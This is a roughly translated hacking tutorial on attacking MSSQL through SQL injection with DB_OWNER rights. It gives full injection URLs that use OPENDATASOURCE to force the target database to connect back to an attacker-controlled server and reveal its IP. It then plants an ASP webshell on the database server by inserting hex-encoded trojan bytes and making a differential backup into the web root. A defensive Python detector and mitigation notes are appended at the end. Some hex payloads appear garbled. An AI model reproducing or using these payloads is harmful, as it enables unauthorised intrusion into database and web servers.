Obtaining the MSSQL Server IP address with DB_OWNER permission

Source: Internet
Author: User
Tags: mssql server

Purreth hacksb.cn

Obtaining the MSSQL server IP address with DB_OWNER permission. Injection is now done with a pile of tools, and the old era of manual injection is gone. Instead there are injection tools such as NBSI, HDSI and AH.D, which are also the favourites of many newbies. Even if you know nothing, a few mouse clicks will show you the password of a website with an injection vulnerability.
The next step is to scan for the admin backend and upload a trojan file; this is simple. If you happen to get SA permission, you can directly open 3389 or upload a WEBSHELL and then work on the intranet. If it is DB_OWNER permission, we should consider differential backup. But what should we do if the WEB server and the database are not on the same machine?
In fact it is not hopeless, but apart from writing a DOS command into the registry so that it gets run on the target server, the options are limited, and that stored procedure can only be called if the user has been authorized on the Master database. Few administrators do this, so the hope is very small.
What should we do then? See Figure 1.

With DB permission, check whether the database is in the same directory as the WEB; if it is, consider differential backup. Unfortunately, no WEB directory is found (Figure 2).

This is reading the path with MSSQL's XP_dirtree stored procedure and writing the result into a temporary table. NBSI did not have this function before; we had to scan for SA, or find the backend and so on. Later NBSI added the treelist function, which lists directories so you can see the directory structure, installed software and so on.
Later, Getwebshell was developed and the function really shone: insert the trojan into the database and then back the database up as an ASP file. That works, but if the database is too big, can you really use a webshell of dozens of MB? Xiaolu's differential backup is not bad either: it reduces the file size and performs a differential backup. But back to the original point: the database is not in the same place as the WEB.
In fact, even if the database and the WEB are not in the same place, there is still a chance; it does not mean there is none. Generally, does every server that has a system installed also install IIS? List its C drive and check whether there is an Inetpub directory; then you know whether IIS is installed. But what if you do not know its IP address? What should we do?
In that case, PING the WEB server and scan the C-class subnet for port 1433 to see which host has it open. But this method is not good: many hosts now have a firewall enabled, so even if port 1433 is open you cannot scan it. What then? You can use OPENDATASOURCE to make the other side's SQL server establish a connection to your own database.
Once the connection is established, you get the database server's IP address. Let's try it. There are a few prerequisites: first, your machine must have a public IP address, and its open port 1433 must be reachable from the Internet.
The site I am currently working on is one where the database is 100% not in the same place as the WEB, but I saw the Inetpub folder on drive C, which shows that the database server has IIS installed; I just cannot get its IP address.
How to do it? Simple: use the method mentioned above. First create a database on your own machine. Open the Query Analyzer and enter:
Create database hack520; Create TABLE zhu (name nvarchar(256) null); Create TABLE J8 (id int NULL, name nvarchar(256) null);
Click execute (Figure 3).

The hack520 database and the zhu and J8 tables are created. zhu has a name field; J8 has two fields, id and name. Now we can start establishing the connection.
First look at this SQL statement: insert into opendatasource('sqloledb', 'server=your IP address;uid=SQL user;pwd=SQL password;database=created database name').database_name.dbo.table_name followed by the statement to execute.
Let's start now...
http://www.xxx.com/news.asp?Id=126 insert%20into%20opendatasource(sqloledb, server=219.149.xx.182; uid=sa; pwd=hack520!#77169; database=hack520).hack520.dbo.zhu%20select%20name%20from%20master.dbo.sysdatabases --
Execute it in IE. At this point the other side connects to the SQL server on my machine. Don't believe it? Run netstat (Figure 4).

Haha, it has connected. Now the IP address of the database server is known, and the database server also has port 80 open. What to do now? Back up a webshell. We know the WEB directory is C:\Inetpub\wwwroot. Good, let's start.
Http://www.xxx.com/news.asp? Id = 126; use tg800; declare @ a sysname, @ s varchar (4000)
Select @ a = db_name (), @ s = 0x737339323238 backup database @ a to disk = @ s -- backup the current database
Http://www.xxx.com/news.asp? Id = 126; Drop table [hack520]; create table [dbo]. [hack520] ([cmd] [image]) --
Http://www.xxx.com/news.asp? Id = 126; insert into hack520 (cmd)
Values (0x3c2565786563757450201095717565737428226c2229253e) -- insert a blue-screen Trojan
Http://www.xxx.com/news.asp? Id = 126; declare @ a sysname, @ s varchar (4000)
Select @ a = db_name (), @ s = 0x433a5c496e65747075625c777777109f6f745c7a68752e617370
Backup database @ a to disk = @ s with differential, FORMAT -- differential backup again; the WEBSHELL is now at http://221.216xxx.xx/zhu.asp
Next we connect with the blue-screen Trojan client. This is simple and I will not cover it here.
Although no SHELL on the WEB server was obtained, at least we did not come away empty-handed: a SHELL on the database server was obtained.
The idea above is good, and I hope it helps you when you run into similar situations, but it still has limitations.
The key is the SQL reverse connection: if the other side has a firewall or TCP/IP filtering, the outlook is not so optimistic.
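As an added defender-side example that is not part of the original article, the following Python snippet scans captured SQL Server query text for the primitives this article chains together: ad hoc OPENDATASOURCE/OPENROWSET outbound connections, xp_dirtree directory enumeration, and BACKUP DATABASE ... TO DISK whose destination (plain or hex-encoded) is a web-content file. The sample entries, IP address and path are constructed, not taken from real traffic.

```python
import re

# Constructed sample entries in the style of query text captured by a SQL Server
# audit or Extended Events session. The 0x literal decodes to C:\Inetpub\wwwroot\zhu.asp.
SAMPLE_QUERIES = [
    "select name from master.dbo.sysdatabases",
    "insert into opendatasource('sqloledb','server=203.0.113.5;uid=sa;pwd=x')"
    ".db.dbo.t select name from master.dbo.sysdatabases",
    "insert into tmp exec master..xp_dirtree 'c:\\', 1, 1",
    "backup database tg800 to disk='c:\\backups\\tg800.bak'",
    "declare @s varchar(4000) select @s=0x433a5c496e65747075625c777777726f6f745c7a68752e617370 "
    "backup database tg800 to disk=@s with differential, format",
]

# Extensions that a backup destination should never carry on a database server.
WEB_CONTENT_EXT = (".asp", ".aspx", ".php", ".jsp", ".ashx")


def decode_hex_literals(sql):
    """Decode every 0x... literal that is printable ASCII; skip anything else."""
    out = []
    for h in re.findall(r"0x([0-9a-fA-F]{2,})", sql):
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            pass  # odd-length or binary literal: not a path
    return out


def classify(sql):
    """Return the list of finding labels for one query-text entry."""
    low = sql.lower()
    findings = []
    if re.search(r"\bopen(datasource|rowset)\s*\(", low):
        findings.append("adhoc_distributed_query")  # server opens an outbound SQL link
    if "xp_dirtree" in low or "xp_subdirs" in low:
        findings.append("filesystem_enumeration")
    if re.search(r"\bbackup\s+database\b", low) and "to disk" in low:
        targets = re.findall(r"to\s+disk\s*=\s*'([^']*)'", low) + decode_hex_literals(sql)
        if any(t.lower().endswith(WEB_CONTENT_EXT) for t in targets):
            findings.append("backup_to_web_content_path")
    return findings


def scan(queries):
    """Map each suspicious entry to its findings; clean entries are omitted."""
    report = {}
    for q in queries:
        found = classify(q)
        if found:
            report[q] = found
    return report
```

Disabling 'Ad Hoc Distributed Queries' and denying execute on xp_dirtree to application logins removes the first two primitives outright; the third is best caught by alerting on any backup destination outside the configured backup directory.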